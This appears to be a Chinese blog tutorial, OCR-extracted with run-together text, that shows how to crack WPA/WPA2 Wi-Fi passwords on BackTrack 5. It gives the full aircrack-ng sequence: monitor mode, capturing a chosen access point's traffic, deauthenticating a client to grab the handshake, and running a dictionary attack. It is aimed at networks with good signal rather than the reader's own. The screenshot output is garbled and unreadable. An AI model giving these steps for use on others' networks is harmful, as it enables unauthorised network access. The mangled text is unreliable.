BackTrack5(BT5)无线密码破解教程之WPAWPA2PSK型无线密码破解

1、昨天发布了BackTrack5（BT5）无线wep密码破解教程之minidwep-gtk破解法一文，对BT5下破解wep无线密码的简单方法做了介绍，今天奶牛为朋友们介绍下如何在bt5下破解wpawpa2类型的无线密码。前提：安装或者硬盘引导了BT5的gnome32位镜像，可以参看奶牛的文章BackTrack5硬盘引导+BT5硬盘安装全教程虽然人们都说wpa的密码难破解，其实，嗯，确实是这样子，不仅仅靠技术，还要靠运气，这里就要用到一个强大的字典咯，木有一个好字典，破解密码灰常困难的说。好了，不卖关子了，说方法：1.打开BT5的Wiednetworkmanager，在application下的i

2、nternet中。选择一个新号较好的AP（那样子用起来才爽嘛）。然后看它的properties，打开properties以后继续打开里面的属性看看这个AP的mac地址跟channel。2.ifconfig看看自己的无线网卡的名称，一般是wlanO或者wifiO,后文中根据实际情况执行命令。开启无线监控airmon-ngstartwlanO6注:wlan0为你的无线设备名称6为你要开启的信道（但是这里的6其实并没有那么重要的说）这一步你可能会看到提示有XXXXXXXX进程影响，没关系，killXXXXXXXXX为给出的进程号，然后重新执行上句直到不报错因为我们已经选择好了目标，我们就直奔目标AP

3、，开始用BT5对其进行监控airodump-ng-wnenew-c4-bssidAPsMACmon0这时候你应该可以看到如下图示：CH1Elapsed:46S12911-05-17101-54BS5IDPWRRXQBeacons#DatarCHMBENCCIPHERAUTHESSIDDB:5D:4C:4C:A6:2A81340234-51阴.WPA2CCMPPSKLos-tPacketsProbesD8:5D:4C:4CA6:：2A弋AC:81:12:3:243F95+-1581D6:4CAO:SF:hA:阳:E_5C4-154-908:5D14C:4CAG:.2A78:E4:：90!:B7:

4、5C8754-09DB;5D:4C;4C胚;2A00:23:76;0A;2B:D1-77Q59DB;5D;4C;4C嗣;2A5C:AC;4C;35;3C;8B-7854-119BSSIDSTATIONP册Rat巳3171612L252根据上图，我们可以找到四个Client客户端的MAC地址，从里面随便选个（最好选择活跃点儿的）。打开一个新的终端，上一个终端不要关闭，后面还需要用到。在新终端中输入：aireplay-ng-O1O-aAPsMAC-cCPsMACmonO执行一次看第一个终端中是否出现了下图所示的标志WAPHandshake。如果出现了，那么恭喜，你离成功已经不远了。如果没有出现就继

5、续重复5的命令就ok了，直到出现握手。CH1Elapsed:445.2611-65-17ie：.54VTPAhandshake：_一_8：5D:4C:4C:A0;2ABSSIDPWF:RXQBeacons#Data,#/sCKMBENCCIPHERAUTHESSIDDB:5D:4C:4C:A0;2A6I539223708154-WPA2CCMPPSKB55IDSTATIONPV/RR.ateLostPacketsProbesD8:5D:4C：41A6:2A8S:?F:FA:A3：E5:C4-154-Q03D8:5Di4C:4C:A0;2A7B:E4：ee；B7;SC;87-B254-10136

6、D8:5D:4C:4C:A0;2AAC:ei：i2；3D;24;3F-735斗-5419535088:5D：4C:4C：A0:2AQQ:23:76:BA:2B:DI-77Q-502D8:5D:C:4C：A0:2A5C：AC:4C:35:3C:8B-7854-1055对BT5握手抓到的包进行破解工作aircrack-ng-wpassword.txt-bAPsMACnenew.cap其中的password.txt为我们需要预置的字典文件，字典文件网上很多，搜搜就有了。奶牛也会放出自己的一些字典文件提供下载，继续关注咯。最后上成果图76366EEAAlrcrack-ng1.1rl899eG：S9：ee16keysteri(325,12V呀27眺A56C7B8579&40EABC92keyfouudIametesMasterKef:6FF4974374An.183775B7C97F7871IBFilaU西QEA4EETransientKey:FDB227DB7KBE5345333216A754A309B